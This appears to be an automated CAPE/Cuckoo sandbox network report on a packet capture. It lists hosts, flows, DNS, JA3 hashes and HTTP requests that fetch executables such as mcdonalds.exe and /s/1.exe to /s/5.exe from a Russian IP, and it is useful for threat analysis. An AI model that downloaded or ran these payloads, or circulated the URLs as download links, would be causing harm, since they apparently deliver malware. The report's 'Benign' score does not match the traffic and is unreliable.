Analysis

Category Package Started Completed Duration Log
PCAP 2019-01-24 01:51:17 2019-01-24 01:51:17 0 seconds Show Log

    

MalScore

0.0

Benign


Signatures

No signatures

Hosts

Direct IP Country Name
Y 92.63.197.153 [VT] Russian Federation
N 138.201.162.99 [VT] Germany
Y ff02::1:2 [VT] unknown
Y ff02::1:3 [VT] unknown

DNS

Name Response Post-Analysis Lookup
www.kakaocorp.link [VT] A 138.201.162.99 [VT]

Hosts

Direct IP Country Name
Y 92.63.197.153 [VT] Russian Federation
N 138.201.162.99 [VT] Germany
Y ff02::1:2 [VT] unknown
Y ff02::1:3 [VT] unknown

TCP

Source Source Port Destination Destination Port
192.168.100.130 49458 138.201.162.99 www.kakaocorp.link 80
192.168.100.130 49460 138.201.162.99 www.kakaocorp.link 443
192.168.100.130 49180 92.63.197.153 80
192.168.100.130 49317 92.63.197.153 80
192.168.100.130 49321 92.63.197.153 80
192.168.100.130 49329 92.63.197.153 80

UDP

Source Source Port Destination Destination Port
fe80::a179:b3ff:199:2314 62906 ff02::1:3 5355
fe80::a179:b3ff:199:2314 58708 ff02::1:3 5355
fe80::a179:b3ff:199:2314 546 ff02::1:2 547
fe80::a179:b3ff:199:2314 54603 ff02::1:3 5355
fe80::a179:b3ff:199:2314 51017 ff02::1:3 5355
fe80::a179:b3ff:199:2314 56067 ff02::1:3 5355
fe80::a179:b3ff:199:2314 55538 ff02::1:3 5355
192.168.100.130 56685 192.168.100.2 53
192.168.100.130 137 192.168.100.255 137
192.168.100.130 138 192.168.100.255 138
192.168.100.130 49962 224.0.0.252 5355
192.168.100.130 55357 224.0.0.252 5355
192.168.100.130 55764 224.0.0.252 5355
192.168.100.130 59227 224.0.0.252 5355
192.168.100.130 59502 224.0.0.252 5355
192.168.100.130 62425 224.0.0.252 5355
192.168.100.130 63232 239.255.255.250 1900

DNS

Name Response Post-Analysis Lookup
www.kakaocorp.link [VT] A 138.201.162.99 [VT]

HTTP Requests

URI Data
http://92.63.197.153/mcdonalds.exe
GET /mcdonalds.exe HTTP/1.1
User-Agent: Windows
Host: 92.63.197.153
Connection: Keep-Alive

http://92.63.197.153/s/1.exe
GET /s/1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://92.63.197.153/s/2.exe
GET /s/2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://92.63.197.153/s/3.exe
GET /s/3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://92.63.197.153/s/4.exe
GET /s/4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://92.63.197.153/s/5.exe
GET /s/5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://www.kakaocorp.link/
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.kakaocorp.link
Cache-Control: no-cache

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.100.130 49460 138.201.162.99 www.kakaocorp.link 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 0.379 seconds )

  • 0.37 NetworkAnalysis
  • 0.007 AnalysisInfo
  • 0.001 BehaviorAnalysis
  • 0.001 Debug

Signatures ( 0.041 seconds )

  • 0.007 antiav_detectreg
  • 0.004 ransomware_files
  • 0.003 persistence_autorun
  • 0.003 antiav_detectfile
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail
  • 0.001 ie_martian_children
  • 0.001 network_torgateway

Reporting ( 0.0 seconds )

Task ID 32045
Mongo ID 5c491a18f28488081186bc5d
Cuckoo release 1.3-CAPE
Delete